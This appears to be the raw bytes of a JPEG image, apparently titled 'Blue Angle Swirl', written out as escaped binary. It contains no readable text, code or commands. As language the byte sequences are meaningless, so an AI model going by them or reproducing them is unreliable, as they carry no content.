+\xdbMM\xc6\x97\xfd\x8d!,m\x1bia\x83M\xda\xf5\x13\xb2\xcc\xba\xbc\x1a\xee\xb6\xcafL\x0c{sW\x1be)3\xf4c\xcd\x04\xa6\xf4bsUfU]M\xc0\xfd\xeb\xa4\xa8\xa1B>\xd4\x19\xd7\x1b\xd5e\xbc\x19\xc6\xa0>\x06\xf5E\x9d_\x87\x06\xb7\x05\x80\xc9\xc5H\xca\x9f\x91U\x15}a\x97\xdc7\x15\xbd\xe83o(okVw_\x80\x16\xcf\x91EI\x01>\xd3\xc5W\xa8\xbbIn{\x90+:\x97\x981\x888\xdf\xea]\x8dDm\xe96G\xd2\xdf\xb5\x16a\xa5\xd5\xff\x00+\x8d\xfe\x0d\x0a@\x06W\xb1\xacqD\xce\x85H\x9e#\x827\xda\x99\xbe\x90\xcdeor\xc0\x07l\xa9>qI\x96\x22\xd0\x8c\x9d\xce\x051v4\xac6\xe3\xf2&O\xdc\xd6b\x82\xeaY\xc7\xda\xb8\xe1\x06*\xcc\xc0\x0a\xa2\xeeu7\x02\xb6\x8d\x1e\xa7v\x12?\xc2Z\xec\xa3f#\xbd%\x1af\xaaJ\xa0\xcb\x1a\x19\x92G8_h\xa9\x8e\x1cp\x1cU\x88\x0f\xe6H\x17\xe2\x89\x14\xf6\xa8\xfac]D\xf7\xac\xe2\xb8\x1b\x9a\x7f\xa3Y\xfa\x8f\xea\xb0\xf6\x8e*\xe5\x84\x93uZp{\xd3V0){\xc9\x80>\x9aw\xa3_N!\x8b\x0b\xfa\x0f5\x94\xcc\xcc\xc4\x93\x96<\x9f\x15\xc1E\x9a]\xb4!\xff\x00\xa9\xa97\x9b\x0d\xb1b<\xd4\xdc>\x7f\x96\x9cw5\xd6\xf1\x99\x1cF\xbf\xadu\xc7\x1dM\xd4^9\xc3lMR\xfa\x11,\x7f\x15y\xed\xd1I\xf4\xd8\x92<\xd5#\x90\xee\x8fN\xfaC_\xc2s\x98\xcbY\xc8v;\xa5o\xc90\x86\x02\xc7\xb5y?tS\xac\x89\xb1S\x90k}\xa6\x17\x9d3\xd4S\xbe7\x1e\x0ds\xcar\xb0\xafR\xea
[Embedded binary JPEG image data (comment: "Blue Angle Swirl"); no recoverable text content.]
\x0c}\x87\x9f\x8a\xbfY\x8ce/#\xdf\xb3\xe3\xb8\xacN*\x8b\xd2\x18(}\x86\xa1Q\xd4\xeeO\xd1\xe6\x81i\x22\xa4\xc1\xb3\xeda\x83B\xea9\x17C<\x1e*Y\xf6=\x09\x0b$\x09\xea8\xcb\xfeQB\x95\xdeF\xf5\x1f\xbf\x02\xab\x18\xd6\xc5\xdb|S\x16P4\xd2\x06#\xdb\xd8y\xad\xc9'5\x16\xe9\xf6\xaf<\xca1\x9c\x9d\x85{\x1e\x93i\x1d\x9d\xa9\x91\x80\xc8\xfd\xe8?\xc3\xfd5c\x8cH\xe3\x0d\x8c\x9f\x81Q\xd6\xaf2\xde\x8c{\x01\x5c\xb2\xb7;\xa8\xa5:\x8d\xc3OpNv\x15\xd1%\xcck\x949\x07\x90{\xd0m\xd7T\xc0|\xd6\x90\xc6w\xe2\xb5\x95\xd4\xd1\x18\xfdF\xc6+\x8c\x90\x82\x09|\x8f\xa5\xbf\xe2\xb1\xae#x\xa4)(\xc3\x0f\xde\xbd\xa4\x90G,df\xb3z\x8fO\x0e\x9a]u\x01\xc1\x1c\x8a\x98\xe7:4\xf35\xa9\xd2\xee\xcb\xc6#c\xfc\xc4\xce\x9c\xfea\xe2\x93\xbe\xb5{w\xfe\xa5\xec\xd4\x05%X08 \xe4\x1a\xd26X42\x89#;gP\xf8=\xc5!\xd6P\xac\x8e\xc9\xc3\x8c\x83M\xd8\x5c\xac\xe9\xa1\xfe\xbe\xff\x00\xf3Ss\x09xL}\xc6\xe9\xff\x00\x14\xdf*\xc9\x85\xd5-\xf5\x01\xbf\x14X\x13Jz\xaer[z\x01M,\xf1\xf6\xe4Sv\x849\x84s\xbdi\x0c\x7f\x81f\x7f\xf9$\xdc\xfd\xbb\x0a=\xb3\x08-7<r~iw&[\xa2I\xce\x9d\xfe\xf5\x17\xccp\xb0\xae\xe4ni \xa4\xf2\xb5\xc4\x81W8\xa7\xad\xa3\x11\xc6\x16\x85eo\xa0j<\xd3 
V\xad\x13]\xda\xa2V\x08=\xc7\x7f\x14\x9d\xcd\xc1\xf3\x8f\x8a\xce\xed\x06\x9e\xe5#\x07\x1b\x9aFY\x9d\xd1\xf3\xcbl(l\xc5\x8dp\xd8g\xfaw\xa6\x80\xee\x9b\xdf\xa5x\x1b\x0a\xa2\x8d+\xf2jWv,i\xbb(\x06\x9f^s\x85\x1b\x80{\xd2\xdd\x09\xb2\x81c\x8f\xd7\x9b`8\x06\x85<\xb2\xddN\x15\x14\xb1\xe1TQ$i/&\xd2\x83\x08\xbf\xd8\x0f&\xbaY#\xb7C\x14\x07s\xf5?s\xf6\xf8\xac\xce\xf7{U\xa2\xf4\xed\x01\xd3\x87\xb8\xee\xdf\x95>\xd4\xb4\x92{\xcbn\xceycT\xcb>\xc0m\xe0U\x91T\x1d\xfd\xc7\xe3\xb5kH\xab31\xdc\xe6\xbbCc\xe94P\xf8\xd8\x05\x1fj\xbaHxl\x11\xf6\xaa\x07\x1b\x8e\xdf\xda\xa6H\xc3.\xa4\xa3\xf5\x1b\x07\x85\x8d\xc5\xb0\xd7\x0bn1\xda\x94\x8eB\x0eWc\xdcVe\x97\xa1S\x90ph\xd6\xb3\x85\x1e\x9c\x9b\xa1\xdb~\xd5\x0c\x16E\xca\xec\xd4\x22\x0885{\x13$F\x09\x8cd\xe5\x1bt57\xd9\x96\xcb_\xe7\x8f\x9a\xba\xb0\x96\x1fE\xf9\x07(|\x1a\x1a\x92\xac\xc1\xc6\xc7\xda\xe2\x94\x0a\xd5\xb5D\xd5\xe9\x7f\x84\xa1I\x88.3\xa4\x0cW\x97@a\xbah\xb9\x07q\xf6\xaf]\xfc$\x9f\x85\xe9\xadw!\xe7e\x1ek9\xdf\xaf\x0b\x1b\x1dV\xe9mm\xfd$>\xe27\xc5`;\x16b\xc4\xe4\x9a%\xdc\xcd<\xc6F<\xd0\xa9\x86>1\x0cY\x15F\xd4\xc7jegG\xe0qY\xd4kE%\xb2x\x14\xca{XnI\x04`\xb9l\x0a\x98\xee\xa2q\x82\xe0\xfc\x83Y\x97\xf3\x09d\xd2\xbfJ\xfe\xf4\xac\xb9\x8ce\x99W\xeeqX\xf0\xd9\xb6\xb5\xec\x11\xc9\x19\xd4\xa3\x07\xbfc\xf7\xac\x0e\xa3b\xf01e\x04\xa7\xfaSv\xb7\xce\x98\xc3\x87^\xe39\x06\x9dG\x8a\xe1?\x97\x8c\x9ec'\xfd)7\x89\xdb\xce#20e8\x22\xb5l\xaeD\xe3I8a\xbf\xebB\xea68&HA\xdb\xeaR7\x14\x84l\xd1\xb8e8\x22\xb7\xdcC=^\xd8\x86\xf5\x90n9\x14\x0bF\xc1\xc0\xdb\xf3/\xdf\xc5i\xdbL\x97V\xe5N5c\x04VU\xccoo0\xc7\x19\xca\xd2_A\xe8\xce.\x01\x1f\x9cf\x89h\xba\xa6\x91\x98d\xea\xa5\xa0}Q\x82\xbc\xae\xe3\xfd\xc53\x03\xe9\x9b#\x89\x06\x7fZ\xd4\x0d\x8d\x85\x0eY\x82\xec\xa7\xf5\xa1\xdcLs\xa7\xf6\x14\xa4\xd2\x1c\xe0\xff\x00j\x02M/;\xefK\x92\xcc|\xe6\xa4)f\xdfz\xd3\xe9\xf6b5\xf5\xa6\x1f \x1a\x99e 
^\xd6\xd4$fi\x8602\x05'x\xc0\xb3\xb2\xf0\xdb\xd3}V\xe8\xcb!D\xfaE$A+\xc6ELe\xee\xaa\xf6V\xfa\x86\xb9?\xc3]\xcf\xcdZ\xe6_Y\xf1\x9d1\xaf\x00P\xb5\xcb\xe9\x08\xf2\x0a\x8e*\x84\x7fQ\xfe\xd4\xf1\xbbA\x1e|'\xa7\x16B\xff\x00\xad\x0fN\x0e\x5c\xd5$\x95#\x5c\xf1\xfe\xb4\xbf\xe2L\x87\xda\x8e@\xec\xa2\xb51\xd0h9c\xa5\x14\xb7\xc0\xa2\xc5k3\x9c\xbeTx\x1c\xd2\xa8\xfdCN\x22h\xe0\x1e\x02\xea?\xde\xb8[\x5c;\x89\x1e\xf2v\x90pC`\x7fn)\xaa4\xe2\xe9K2\x1fNr\x1cvjZ{{\x9bV\xc4\xd1\x9d?\xd48\xa8Iz\x94d\x1di&;\xb2\xe1\x8f\xea+B\xcf\xadD\xea \xbd\x89\x97V\xd9a\xb5c\xef\x14\xad\x8d\xfc\xf6_\xcb\xd3\xeaA\xfd<\x91E\xbe\xb6\x8e\xe9?\x15bA\xfe\xa4\x1c\x8aP\xe2\xa22\xf1K\xea\xc0\xfa\x1c\x7fc\xfaV\xee\x1c\xee\x22\x88\xc46\x0eC\x0eh\x8e\x04\x83\xc1\xa3\xbc\x90^&.S\xd1\x9cp\xeb\xc3R\xae\x1a)t9\x07\xc1\x1d\xe8*A\x07\x07cV\x95\xb5D\x18\x8fvq\x9f\x22\xa2S\x9cy\xa0\xfb\xe7\x99a\x87vc\x8a\xa0\xfd\x1a\xcd\xef\xfa\x88\x03\xe8]\x8b\x1e\x00\x15\xe9.\xe6VE\x82!\xa6(\xc6\x00\xf3\xf3KX\xc2\x96VB\xde?\xa8\x8f\xe67\x9f\x8a\xba+3\x00\xa0\x93Y\xd7\xb1\x00\x12p\x06M9mf\xe5u\x11\xfd\xe8\xd6\x96\xe9\x02z\x92\xee\xde*\xb7\x17lN\x10\xaa\x81X\xb9\xdb\xc4]\x14\xba\x8f\xd3\x9bNj\x92\xb1)\xe9&@\xeeh\xf2$\xb39%F\xc3v\xec++\xac\xf5HmP\xc3j\xe2I\x8f\xd5 \xe1~\xd5{\x9a\x13\xd4\xaea\xb2\x8fNCLF\xc8;|\x9a\xc8\x09%\xd3\x99\xa7bK\x1a\x8bh\x9aV\xf5\xa5$\xe4\xe7~Z\x9f\x86<\x8c\x9d\x80\xad\xc9\xa4)\xf8R\x87Te\x90\xf9\x14H\xeen! 
\xba\xea\xff\x002\x9c\x1a\xbd\xe4\xe1\x13?\xd8y\xa0\xb4\x97\x18\x19\x80\xe0\xf94\x1a\x96\xb7\xb1\xce\x06\xa6\xf7p\x1b\xfehw\xf6\xa2Oz\x00\xaf\xf1\xc3}\xab7([ \xb4OL[\xde<^\xd9\xb0\xcb\xe4Vu\xf8\x02Fxd\xc8\xc8a\xcd<Lw\xb6\xc4p\xe2\xa2x\x92\xe6=h\xc0\x9f#\x9f\xd6\x92\x05\xe1\x97m\x98S\xb1\xd0;C1F\xe74\xe4G\xdb\xa0}\xd4\xd0\xaeQn\xe1\xf5\x13i\x17\x91\xe6\x87k!e\xd3\x9c2\x9d\xaa\xc0f\x90\x97bv U#\x1a\x8f\xcf\xeeh\xd2(e\xf5\x17\xb8\xc3\x0a\xa5\x89\x1f\x89L\xf1\xa8f\xb45:e\x90\x8d\x04\xf3\x8f\xfaT\xd0\xba\xc5\xe6G\xa6\xa6\x99\xeb\x17&5*+\x09\xd8\xb3\x12{\xd7,f\xfe\xd5\x5c74T\x5c.\x0dDK\xdc\xd4\xc8t\xaek\xb4\x88\x0c\x8b\xb9\x00\xe2\xba4W:X\xe1\xbbg\xbdK\x12NMLAX\xe1\x94\x1a\xd5\x82E\x8b1\xe1O\xdc\xd1\x97\xa7\xc8\x17\xf2\x8f\xd4T\xc3\x10'\x09#)\xf0w\xa3$\x13\x9eN\xc3\xbdb\xec\x0dm\x117\x92@~\x05K\x98\xd1r\xab\xa4y\xef]pV/\xa9\xb5\x1f\x8aRGg95f?\x91i%f;l*\x8cu.\x96\x01\x87\x83W\xb6\x89\xa5|\x0e;\x9a\xb5\xcb\xa8m\x11\x81\x85\xf8\xe6\xad\xb3\xa1Ge'e\x15B\x01\xf8\xae\xae\xa0\xa4\x84\xae\xd9\xd8\xd5]\xb5\x15\x07\xb5u\xc3p;\xd5\x19\x82\x82{\xd4\xa2'bN\x95\x19,p\x00\xef[\x1d\x22\xccZ\xc5\xad\xc02\xb7'\xc7\xc5\x03\xa2\xd9\x85\x02\xe6a\xef?@?\x96\xb5\x11\x0b\x1f\x8e\xe6\xb3GF\x85\xdb\x03\xfb\xd3p\x98\xe0\x5c\x82\xab\xe5\xdc\xe0VgR\xea\x90Y\xa9\x8e<I \xfc\xa0\xff\x00\xa9\xac[\xbb\x9b\xcb\xd7\xd54\x87\x1d\x87aY\xd5\xc9^\x9eN\xab\xd3R\x5cH\xe6f\x1d\xfb\x0a\x15\xe7\xf1\x0d\x8c\x03\xf9\x10)<\xf1^U\xe1\x90n\x0e\xf5\x060\x83T\xad\x92x\x1ejxCg\xfa\xaf[\xbe\xbfR\x9a\xbd8\x87a\xb5+gm\xacz\x92l\x9d\x87v\xa2\xda\xdb\xe5D\x93\x8c/\xe5O?zn$,x\xda\xb7$\x9d\x22!\x8fQ\xce6\x15k\x87\x00\x15\x1by4IYcL\x01\xbdg\xdd3\xcb/\xe1\xa3\xdd\xdf\x9f\x8a\x09\xb5\x1e\xbc\xcd;\x0f\xe5\xc7\xb2\x8f&\x9c\xd0\xa0\x8d~\xe7ns\xda\xa2\x14H\xd4\x22\x8f\xe5\xc5\xff\x00\xf4j\xb9&L\x9eI\xab 9\xb4G\x18\xc7=\xa8\x17\x1d6E$\xc4O\xfd'\x8a\xdb\xe9\x89\x11\xb8`\xec\x03\x01\xed\x07l\xed]s\xacH\xc0\x8co\xc5g|\x8f6\xa6{W\xc8\x0d\x1f\xc7cM,\x90\xdd\xa6\x924\xc8)\xfb\xa1\x1b\xae\x99P\x10~+:\xe2\xc1\x87\xf3-\xdf 
o\x8c\xee*v\x02\x0c\x96\xf3|\x8f\xde\xa6\xe5A\x1f\x89\x8b\x91\xf5(\xaeI\x84\xa3\xd3\x9b\xda\xe3`M@\xd7\x0c\x9b\xf0\x7f\xb1\x14\x07\xb5\x94\x11\xa8n\xad\xb1\x15\x07\xd96\xdev\xa5\xc9\x11I\xa9w\x8d\xb9\xf8\xa3\x1fr\xe7\x92?z\xd4\x1a=d\xeb\xb6\x8aP~\xa0+>%.\xe1@\xf8\xa7l[\xf1\x16\x12[\xb6\xe5=\xcbJ[\x9d\x17\x0b\x9d\xb0w\xa9\x8f\x1c\x02\xb2\xe1\xf4\x8e\xd4\x09\xf3\xeac\xb0\xad\x19!\x02S\xdb\xe6\x95\xba\x8f\x9c`\x91\xde\xb7\x8eAw\x18\x18\xfd\xe8\x91\x00\x13#\xbd\x0c\x1d\xb0\xd5*Jo\xc85\xa0\xcd\xbc\x822I\x075\x17\x17LF\x01\xc0\xa5\xdaBx\xda\xa8w\xa9\xe3\xee\x89bI\xc9\xa9\x89\x0b\xb6\x05T\x0c\x9c\x0a~\xda/N t\xeey\xa6WB\xcc\x9e\x8c\x1a\x17\x96\x1b\xfd\xa9g\x8dG\xb9\xce\x05\x1a\xf2\xe1s\xb9\x05\xbc\x0aNGg9cX\xc6_b\xb5\x0c@ROj\x93K\xdc>[H;\x0ekb\xac\xd9b\xedNt\x8bC3\x89\xe6_`\xfaA\xefB\xe9\xd6\xads(g\x18\x8d\x7fz\xd8\x9aH\xad\xa0\xd4\xc4\x05^\x05b\xd0RU\x14\xb3\x90\xaa9&\xb2\xba\x8fSy\xb3\x0d\xa6U8/\xdc\xd2\xbdB\xed\xee[\xdeJ\xc6>\x94\x1d\xea\x90\xc5<\xab\xed]\x0b\xe4\xf3MlB\xacq\xee\xcc3\xe4\x9a\xbaI\x1b&\xa5`@\xa2'O\x8f\x19c\x96\xf9\x19\xa8\xff\x00\xc2\xd6I2\x06O}5x\x003km\x10\xa9v\xf8\xe0S\x16\xd6\x82<M9\xd5!\xdc/\x8ai#\x86\xd1\x02F\xa0\xbe<l*\x8a\x0b>I$\x9aA1\x82\xef\x93\xbd\x1fd\x04\xd4\xa2\x04_\x9a\x0c\xecY\x82/z\x807r\x84\x8d\xa6>p\x83\xc9\xaa\xf4\x941\xdb\xbd\xe3\xee\xf2\xe5c?\xeaik\xd77\x17k\x04[\x84:W\xe4\xf75\xab\x22*\xcd\x1d\xba\xfd\x10.\xf5(\x1b\x82\xaa\xb0\x8ey?z\xa3\x02\xa7\x06\x9d\xe9\x90\x8b\x8b\xb6\x91\xfe\x91N\xc9\x05\x99\x04\x12\x7fJ\xd6\xf5\xc0\xcd\x8a\xed\xc2\xe9\x93\xdc\xbf\xb8\xfbSky\x11@\x19\xf2{\x1a\x8f\xc0\xc2\xccJ\x07#\xe4\x80)\x9b~\x90d\x19Xv\x1d\xc8\xdb\xfb\x9a\xcd\xb8\x85\x9aH\xa5\xdb*~\xc6\x94\xb8\x89\xe3\xf7!8\xady:DAN\xb7\x85\x1b\xc0m\xff\x00aKOaq\x1a\xe5\x1cH\xa3\xb6sY\x99c\xea\xae\x99\x13\x08\xe7\xff\x00\x10ia\xc3\x0a\x0b\x96\x8f\x11\xcb\xeeN\xcc)\xe9\xe1R}\xc3A\xf9\xe0\xd2\xce\xac\xa3K\xaeT\xf6=\xebz@~\x83\x83\x86V\xfd\xeaboL\x84'*~\x93\x5c\xcaP{w^\xea{U6#\xe0\xd4\x0eZ\xca`\xb8Y\x07\x1d\xc7\xc5_\xa8\xc6#\x9fZ}\x0f\xeeSJB\xe4\xfb\x1b\x91\x
c7\xcd9\x19\xf5\xec\x8cG\xeb\x8bu\xfbS\xde\xc1\xa7\x94\xc9\x02I\x9eF\xff\x00z]f\xc6\xcdSju\xc0\xf1w\x1e\xe5\xff\x00z\x0bV\xb1\x90\x11\x8co\xf0hD\x11\xb0\xdcWc5\xda\x1b\xb5j]\x0a\xd7T\x95a\xc85\x15v,\x84\x06\xc9\xa2Is#.\x9c\xe0|Pp|T\x81R\x88\xae\xae<\xd7P\x06\xe2L\x0c\x0ejz}\xab\x5cK\xbet\x0eO\x9a\xeb\x1bg\xb9\x9b'\xe9\xeekF\xea\xe2+(t \x05\xb1\xb0\xacZ\x09q46p\x0e2\x07\xb5EdK,\xd7s\xf1\xa8\xf6\x1d\x96\xad\x14S^M\xad\x89\xc1<\xff\x00\xc5m\xd8t\xe8\xe0\x88<\xa9\x81\xd9|\xfd\xeb;\x93\xb1\x9d\xd3\xbak1\xd6\xd8c\xdd\x9b\x81Z1\xdb\xdb\xa0\xf7\x96s\xf1\xb0\xa3\xbeX\x0c\xfbPp\x05%}r#S\x1cg\xdcy\xf8\xab\xbd\x83\xcd%\x94{\x88\x00\xf1\x964\xac\xf7\x8f \xd1\x10\x08\xbe@\xc5+\xee\x90\xeabq\xe4\xd5\xd4\x16\xf6\xa8\xc0\xab1\x10\x06[\x03$\x9e\xe7\xbd5\x0ca\x13'\x9a\xebxp2{U\x98\x83\x96?J\xd2\xd09\x8e\x07\xc9\xdc\xd2\xd2\xbf\xa3g-\xc1\xe4\x8d+\xf7\xab\xdc1\xd3\xf2\xdb\x9a\x0f]\xfe_M\x86/\xea94\xa2\xbf\xc2\xf0\x97\xea:\x88\x07\xd1\x88\xb9\x07\xc9\xa7\xad\xff\x00\xc4\xb8'\x9c\x1a_\xf8U\xd5z\xb3\xc4\xc7\x1e\xb4eW\xe4\xd1\xe4\x06;\x99\xc7\xf9j{\x0e\xf4\xc3\xa3\xa6\x926gb(\xb1\xa0/\x8f\x1b\xb1\xf1C\xb6_N\xd65=\x97?\xa9\xa7\xfa|F1\xaeE\xce\x91\xea0?\x1c\x0f\xef\x8a\x99]M\x91c,v\x80j\x0b\xac\x0eH\xd4T\xf8\x03\x8d\xbc\xd2\xb3_\xca\xecI\x19\xcfwb\x7f\xed@\xea\xac\xff\x00\x8c1\x17\x00\xa0\xf718\x03\xcd.\x90z\x8b\xaa9c\x93\xeck\x13\x19\xddS\x7f\x8a\x9b#\x05\x07\xff\x00\x88\xab\xad\xcc\xf9\xd4J1\xfb\x0a\xceoR3\xef\x0c\xbf=\xaaVV\x189\x07\xedZ\xf1\x88\xd2k\x88\xa5\x04\x5cE\x9c\xf7\xc6\x7fz^n\x9e\x92)ky\x01\x1f\xd0\xc6\x80\xb3\xe7\x92A\xa87\x0d\x13d\xe4|\x8aLl\xe9J\x5c\xdb\xc9\x0c\x85]\x08\xf8\xa5\xa5\x8f\x03Z\x0c\x8e\xe2\xb6\x92\xee\x19\xe3\xf4\xe7\x01\x87\xcf\x22\x97\xbb\xb3\x08\xbe\xa5\xbbkN\xe3\xb8\xab\xbfU\x19\x07\xb1\x1d\xa9\x8biJ\xb0u\xe4sU\xb8\x87H\xd7\x1e\xe3\xb8\xf1AV\xd2u\x0f\xd4U\x81\xf9\xbf\x95p\xb3G\xf4\xb6\xe3\xfe+\xae\x95u\xebLiq\x91\xf1T\xb7q$~\x93\x1ewS\xe0\xd4! 
\x18\xdb\xf4\xf85gc\x93\x9a\x91\xbf\xc5EA$\x1c\xd6\xf4.7\xd8\xb0\x1fz\xe2\x0e>\xa5\xfe\xf5E\xd6\xdb\xad\x10G&?-,\x15`\xbesU$b\xbaee\xe4\xe7>*\x94\xd7\x03\xab\x8f\x15\xc4\xe2\x81<\x9d\x85\x03\xd77\x11\xdaC\xe9D2\xf8\xc5-on\xf2\xbf\xabpI\xce\xfa|\xd4\xda\xc5\xee\xf5\xa5\xdd\x8f\x00\xf6\xa6\xa1\x0d$\x81@\xe4\xd7=\x87\xbadh\x08:F\xdf\xb55;\xebl\x93\xed\x144U\x86-?\xdc\xd2w\xd7x\xf6\xa9\xdf\xc7\x8a\xce\xb7U\xddB\xef\x03Bs\xfe\x94\x80R}\xcd\xff\x00\xddX)\xfa\x9f\x93\xda\x8b\x14L\xed\xbdnM\x22\xb1\xa1s\x8e\x00\xe2\x9c\xb6\x83|\x01\xbdL\x10\x92\xc1Tnh\xf7\x85m\xe3\x11'\xd6~\xa3\xe2\xa5\xcb\x9d@\x09\x88,\x22\x8f\x7f'\xc9\xaa])\x0e ]\xf0w\xf9\xa6z\x5c%\xb5M\x8f\xa0m\xf7\xa5T\x86\xbd\x1a\xce7\xe4\xd3|\xe8)!\xcbj\xed\xaa\x9d\xbd\xb6\xb6\xea\x16\xe9\x99\x82\xb2\x8cPd\xb6\x9a':\xe38\xf2W \xd0\xc4hN\xfe\x9a\xfe\xa4U\xbc\x8bY\xd8Get\x97S\xdd\x07\xf4\xb7U^I\xa2B\xa6{\x86f\x18\x0er\xc3\xc0\xec*\x88\x90)\xcbJ\xbf\xfe\x00\x93\xfd\xcd;\x00R\x8a#\x18\x0d\xc5@\xdd\x94a\xdf\xd5\x93\x1aW\x80x\xa6\xe4\x94Ej\x92\x9e%\x97P\xf9U\xff\x00\xbeiH\x12[\xbb\x94\xb6\x80\x1d$\x85\xdb\xfdi\x8f\xe2\xcd1N-\xe3\xfa \x88\x22\xd7,\xae\xec\x8a\xc4\xba\x8eK\xbb{\x97\x19-\x8ddy\xde\xb2!\x91\xe2|\xa9#\x15\xe8z<\x82+\xec0\xca\xb0*G\x9a[\xf8\x97\xa4\xb4\x0f\xeb\xc2\x09\x8d\xb7\x15\xbf).\xa8\xad\x9d\xf8u\x0b6\x19|\xe2\x8d-\xaa\xba\xeb\xb7o\xd3\xb5a\xc4\xe5\x1b\xe3\xb8\xa7\xecn\x9e\x22\x19\x0eW\xb8\xabf\xba\x04\x93*\xc5]t\xb0\xf3\xde\xa3Q\xdcr<\x1a\xd4\x83\xf0\xd7\xf1`\x90\x1b\xe7\x8aZ\xfb\xa7M\x01\xca\x82G\x83I\x9c\xea\x9a \xeb\x8d\xd7\xff\x00\xaa\xbd\xbc\xd2Du#d\x0eEP\x92\xa7\x0c\x0a\x91\xe6\xa7\x93\x90w\xae\x9d\xf6\x86\x18\xc5?\xbe0\x12^\xeaxj\xcf\xbc\xb7*\xc5\x90\x11\x8f\xa9|Q\x9bc\x91\xb1\xa2\xac\xa2A\xa6S\x828q\xfe\xf5\x8b\x8e\xba\x19\xd0\xbe\x96\xe7ji\x8e\xb4\xf5\x07\xd4>\xaf\x9a\x15\xec\x05[R\x80>\xdc\x1a\xad\xb4\x9a[\x07qH\x0c\xa7\x22\xa1\xfc\xd4\x91\xa5\xbe\x0f\x15\xcd\xba\xd6\xe5\x17\xb78S\xe6\xaf\xa8\xd0\x228\x7f\x8a5[\xd8\xac\xe7+A4I\x8fj^y\x02\x8c\x0eh)q 
\xce\x075[XZyB\x8e;\x9a\xach\xd2\xc9\xa4nkBB\x96V\xdaF5\xb5b\xd1E%\x9a\xb4\xec#X\xa3\xd6\xc3sJXC\x9c\xc8\xdc\x0f\xde\x8b<\xc4\xfbWsY\xa2o\xeeNt\xae\xe4\xf6\xa5T\x15l\xb7\xb9\xcf\xedVE\xf7a=\xcey=\x855ml4\xebo\xa7\xbby\xfbU\xe2\x01A\x0b1\xd6\xdf\xaei\xa8c,B \xde\xa5\x14\xbb\x84E\xdb\xb0\xadk\x1bd\xb5@\xf2`\xb9\xacg\x9e\xbbP\x96\x05\xb4\xb5.\xc3\xdcEc\xce\xcc\xd2\x96c\x92MzGAr7\xe1Fk\xcf\xdc\xc4K\x1d\xb1\xbdO\x8a\xee\xee\x95\xa5\xd1b/k\x22&5\x15\xc0\xcdd\xde\xc2\xc8\xe4\x15!\x97b)\x8e\x9fx\xf6\xd2\x85m\x8f}\xf9\xad[\x8bx\xba\x8c>\xa4ED\xc0\x7f\xfbV\xb9\xc6\xecy\xf8.g\x8c\xfbe`>\xf5\xb7\xd3}\x1b\x98?\x98\x8a\xcd\x8eH\xac{\xcbg\x8d\xd8\x15*G \xd1:5\xd8\xb7\xb8\x1a\x8f\xb4\xd6\xb2\x9b\x9b\x80}b?NP\x02\x80\x01\xec)\x9b`\x5c\xa8\x1c\x91\x81Lu\xdbaq\x17\xaf\x0f\xb8s\xfa\xd2\x16S\x10\x06N\x1d\x0d%\xde(\xf6\x7f\xc3\xd6\x0bj\x86r1\x85\xd8\x9e\xf5\xe7?\x89$\x0ds;\x1e\xe7\x15\xa9i\xd6\xa5\x9e\xdf\xd1p\xa3m\xcd`\xf5\x97\x0d#\x1c\xe7&\xb8|x\xe5\xe7\xcbW\xa03\xa6l\x83\xce\xe2\xb7z|\xf1\x5c\xda\xfa\x17\x18(\xfb\x03\xfd&\xb0\x07\xba\x05a\xca\xeci\xae\x970\x12\x98\x9c\xe1\x5cs\xe0\xd7L\xf1\xdcHO\xf8\x93\xa4Ig9e\x5c\xa9\xf1\xc5eD\xe66\xcf#\xb8\xafwjR\xed\x1b\xa7\xdd\xe3X\xfa\x18\xd7\x95\xfe#\xe9rY\x5c\xb7\xb4\xe350\xcf\xfer,\x0e\x09Z<I\x11\xd8\xf2+{\xa3\xf54\x96?Jq\xa9{\x83\xb9\x15\xe5\xad\xa51\xb6\x0f\x06\x9bFh\xdcI\x19\xad\xe5\x8e\xcd\xbd]\xc7E\x8a\xe9=H\x0a\xb2\x9e\x01\xff\x00\x9a\xc9\xbd\xe9\x12@\xf8\xd0\xc9\xf7\xe0\xd1:/XxXa\xb0{\xa9\xe0\xd7\xac\xe9\xb7\x96\xb7\xf1`\xe9\x0d\xc1V\xae7,\xf0^\xde\x16n\x9f6\x9dJ\xa5\xbe\xd4\x9b\xab+a\x81\x07\xe4W\xd2\xa5\xe9\x90\xf2\xa8\x07\xc8\xa4:\xb7G\xb6\x9e\xdf\x12G\x83\xd9\xd4n)\x8f\xf2?'\x8b\xc2\xa4\x83O\xa7 
\xca\xf6>){\x98\x8a6G\x07\xc5iu~\x9b-\x9b\x1d\xc4\x91\xf6q\xfe\xfe)\x15#t\x7f\xa4\xfe\xd5\xdf\x8b7\x19R\x17\xd4\xba\x0f=\xaa\xea{\x1a\x0c\xc8b\x93m\xc7b*\xe8\xda\x97#\xf5\xab\x05\x98`\xd1\xa39\x5c\xd0y\x15hN\x1b\x1ek}\x81\xdc>\x9c\x93J\x1dN\xfbnM5\xd4G\xb75\xdd-Tk\x95\x86\xca*Ph\x95,\xed\xf5\xb65\x1aZ0\xd7\x12\x99\xa4\xe3\xb5D\x8c\xd7S\xe4\xe4 \xa3p06\x02\xb2\x1f\x9aP\xa8\x11vQB\x89K\x8c\xb1\xd2\xbd\xfc\x9a\x11\x908\xdc`\xd3\x16\xb8vPx\x03\x8a\x9d@\xcd\xbc)\xa7Q]1\xfe\xedDl\xc8B\xa8\xc0\x1c(\xedVE/\x82O\xc6)\xebD\x86\xd5}i\x86\xe3\xe9Z\xc5\xba\xfe\xd4n\x9bj\xb6\xf1z\xb2\x8fq\xe0R\xd7RK5\xf2\xc6\x999\xe0\x0a\x1d\xdd\xf4\xb3>\xa1\xedQ\xc0\xad?\xe1S\x11\xfe'\x85\xa4\x00\x83\x0e\xa5\x04s\x5c\xf2\x96M\xd1\xaf\xd2z\x15\xd7\xe0\xc4\xc3\x00\xf8n\xf4.\xa1\xd1\x12C\xfc\xdbS\x03\xe3\x1a\xe3\x19S\xf7\x14\xf7R\xebR\x17)\x19\x0a\x01\xc0\x02\xa2\xd7\xae8\xf6\xc8\x01\xfb\xd7\x09~N\xda\xe1\xe3z\xbfJ\x9a\xd9\xb1\x22jC\xf4\xb8\xefI[\xdc\xcdg 